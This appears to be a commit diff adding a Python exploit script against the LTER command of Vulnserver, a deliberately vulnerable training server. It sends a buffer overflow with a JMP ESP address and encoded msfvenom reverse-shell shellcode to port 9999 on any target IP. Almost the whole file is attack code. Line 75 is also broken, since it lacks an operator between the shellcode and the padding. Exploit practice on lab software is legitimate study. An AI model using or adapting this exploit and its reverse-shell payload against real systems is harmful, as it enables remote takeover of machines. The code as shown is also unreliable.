|
| 1 | +######################################################################################### |
| 2 | +# Title: Vulnserver LTER command exploit |
| 3 | +# Author: Marco Lugo |
| 4 | +# Description: execute payload |
| 5 | +# |
| 6 | +# To get Stephen Bradshaw's Vulnserver, visit: |
| 7 | +# http://www.thegreycorner.com/2010/12/introducing-vulnserver.html |
| 8 | +######################################################################################### |
| 9 | + |
| 10 | +import socket |
| 11 | +import sys |
| 12 | +import os |
| 13 | +import struct |
| 14 | + |
| 15 | +jmp_esp = struct.pack('<I', 0x62501203) |
| 16 | +# msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -e x86/alpha_mixed BufferRegister=ESP -f python |
| 17 | +buf = "" |
| 18 | +buf += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" |
| 19 | +buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" |
| 20 | +buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" |
| 21 | +buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" |
| 22 | +buf += "\x79\x6c\x68\x68\x6f\x72\x63\x30\x33\x30\x37\x70\x65" |
| 23 | +buf += "\x30\x6c\x49\x79\x75\x45\x61\x49\x50\x72\x44\x6e\x6b" |
| 24 | +buf += "\x66\x30\x64\x70\x6e\x6b\x63\x62\x56\x6c\x6c\x4b\x43" |
| 25 | +buf += "\x62\x36\x74\x6c\x4b\x52\x52\x75\x78\x74\x4f\x6f\x47" |
| 26 | +buf += "\x52\x6a\x61\x36\x50\x31\x59\x6f\x4c\x6c\x45\x6c\x55" |
| 27 | +buf += "\x31\x73\x4c\x36\x62\x44\x6c\x47\x50\x6f\x31\x48\x4f" |
| 28 | +buf += "\x46\x6d\x56\x61\x69\x57\x58\x62\x78\x72\x71\x42\x46" |
| 29 | +buf += "\x37\x6e\x6b\x53\x62\x66\x70\x4e\x6b\x30\x4a\x75\x6c" |
| 30 | +buf += "\x4e\x6b\x62\x6c\x64\x51\x33\x48\x4b\x53\x43\x78\x75" |
| 31 | +buf += "\x51\x4a\x71\x46\x31\x4c\x4b\x36\x39\x57\x50\x33\x31" |
| 32 | +buf += "\x39\x43\x6c\x4b\x30\x49\x42\x38\x5a\x43\x47\x4a\x62" |
| 33 | +buf += "\x69\x6c\x4b\x50\x34\x6c\x4b\x76\x61\x78\x56\x35\x61" |
| 34 | +buf += "\x49\x6f\x6c\x6c\x6f\x31\x5a\x6f\x34\x4d\x46\x61\x7a" |
| 35 | +buf += "\x67\x45\x68\x4d\x30\x52\x55\x5a\x56\x34\x43\x33\x4d" |
| 36 | +buf += "\x79\x68\x57\x4b\x33\x4d\x67\x54\x73\x45\x7a\x44\x62" |
| 37 | +buf += "\x78\x6e\x6b\x42\x78\x54\x64\x65\x51\x4b\x63\x65\x36" |
| 38 | +buf += "\x6c\x4b\x44\x4c\x42\x6b\x4e\x6b\x50\x58\x57\x6c\x36" |
| 39 | +buf += "\x61\x38\x53\x4e\x6b\x75\x54\x4c\x4b\x36\x61\x38\x50" |
| 40 | +buf += "\x4f\x79\x57\x34\x75\x74\x47\x54\x33\x6b\x71\x4b\x73" |
| 41 | +buf += "\x51\x31\x49\x52\x7a\x52\x71\x59\x6f\x6b\x50\x43\x6f" |
| 42 | +buf += "\x63\x6f\x62\x7a\x6e\x6b\x54\x52\x5a\x4b\x4c\x4d\x51" |
| 43 | +buf += "\x4d\x32\x48\x35\x63\x55\x62\x73\x30\x53\x30\x52\x48" |
| 44 | +buf += "\x54\x37\x43\x43\x56\x52\x61\x4f\x53\x64\x31\x78\x50" |
| 45 | +buf += "\x4c\x74\x37\x75\x76\x73\x37\x69\x6f\x78\x55\x48\x38" |
| 46 | +buf += "\x6a\x30\x66\x61\x57\x70\x33\x30\x34\x69\x58\x44\x42" |
| 47 | +buf += "\x74\x36\x30\x43\x58\x76\x49\x4f\x70\x52\x4b\x55\x50" |
| 48 | +buf += "\x59\x6f\x4e\x35\x42\x70\x46\x30\x50\x50\x62\x70\x43" |
| 49 | +buf += "\x70\x50\x50\x37\x30\x70\x50\x35\x38\x6a\x4a\x64\x4f" |
| 50 | +buf += "\x39\x4f\x59\x70\x4b\x4f\x4e\x35\x6d\x47\x31\x7a\x74" |
| 51 | +buf += "\x45\x32\x48\x31\x6f\x37\x70\x67\x70\x35\x51\x42\x48" |
| 52 | +buf += "\x73\x32\x57\x70\x37\x61\x43\x6c\x6e\x69\x7a\x46\x51" |
| 53 | +buf += "\x7a\x76\x70\x73\x66\x43\x67\x71\x78\x4d\x49\x6f\x55" |
| 54 | +buf += "\x44\x34\x43\x51\x69\x6f\x4a\x75\x6e\x65\x4b\x70\x30" |
| 55 | +buf += "\x74\x46\x6c\x6b\x4f\x62\x6e\x54\x48\x42\x55\x68\x6c" |
| 56 | +buf += "\x65\x38\x5a\x50\x6e\x55\x59\x32\x33\x66\x59\x6f\x38" |
| 57 | +buf += "\x55\x35\x38\x65\x33\x52\x4d\x63\x54\x77\x70\x4b\x39" |
| 58 | +buf += "\x49\x73\x73\x67\x66\x37\x30\x57\x35\x61\x68\x76\x71" |
| 59 | +buf += "\x7a\x67\x62\x36\x39\x50\x56\x6a\x42\x49\x6d\x50\x66" |
| 60 | +buf += "\x68\x47\x57\x34\x56\x44\x75\x6c\x37\x71\x56\x61\x4c" |
| 61 | +buf += "\x4d\x53\x74\x34\x64\x64\x50\x49\x56\x63\x30\x61\x54" |
| 62 | +buf += "\x51\x44\x36\x30\x71\x46\x46\x36\x53\x66\x62\x66\x72" |
| 63 | +buf += "\x76\x72\x6e\x43\x66\x42\x76\x71\x43\x42\x76\x71\x78" |
| 64 | +buf += "\x53\x49\x7a\x6c\x37\x4f\x6b\x36\x59\x6f\x4a\x75\x4f" |
| 65 | +buf += "\x79\x4b\x50\x50\x4e\x71\x46\x72\x66\x69\x6f\x56\x50" |
| 66 | +buf += "\x71\x78\x64\x48\x6d\x57\x45\x4d\x31\x70\x49\x6f\x59" |
| 67 | +buf += "\x45\x6f\x4b\x58\x70\x38\x35\x59\x32\x62\x76\x70\x68" |
| 68 | +buf += "\x59\x36\x6e\x75\x6d\x6d\x6f\x6d\x39\x6f\x49\x45\x67" |
| 69 | +buf += "\x4c\x53\x36\x43\x4c\x75\x5a\x4d\x50\x49\x6b\x6b\x50" |
| 70 | +buf += "\x34\x35\x56\x65\x4f\x4b\x67\x37\x46\x73\x32\x52\x42" |
| 71 | +buf += "\x4f\x51\x7a\x55\x50\x71\x43\x69\x6f\x69\x45\x41\x41" |
| 72 | + |
| 73 | +target_ip = sys.argv[1] |
| 74 | +buffer = 'LTER /.:/' |
| 75 | +pattern = '\x41'*2003 + jmp_esp + buf '\x43'*(3503-2003-4-len(buf)) |
| 76 | +buffer += pattern |
| 77 | + |
| 78 | +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| 79 | +sock.connect((target_ip, 9999)) |
| 80 | +sock.recv(1024) |
| 81 | +sock.send(buffer) |
| 82 | +sock.close() |
0 commit comments